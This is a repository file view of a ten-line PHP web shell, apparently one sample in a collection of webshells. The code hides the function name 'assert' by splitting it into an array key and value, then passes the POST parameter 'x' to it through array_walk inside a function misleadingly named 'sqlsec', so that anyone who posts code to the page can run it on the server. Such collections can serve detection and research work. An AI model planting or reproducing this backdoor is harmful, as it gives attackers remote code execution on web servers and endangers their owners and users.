webshell/php/2020.08.20.12.php

10 lines
165 B
PHP
Raw Normal View History

<?php
function sqlsec($value,$key)
{
$x = $key.$value;
$x($_POST['x']);
}
$a=array("ass"=>"ert");
array_walk($a,"sqlsec");
?>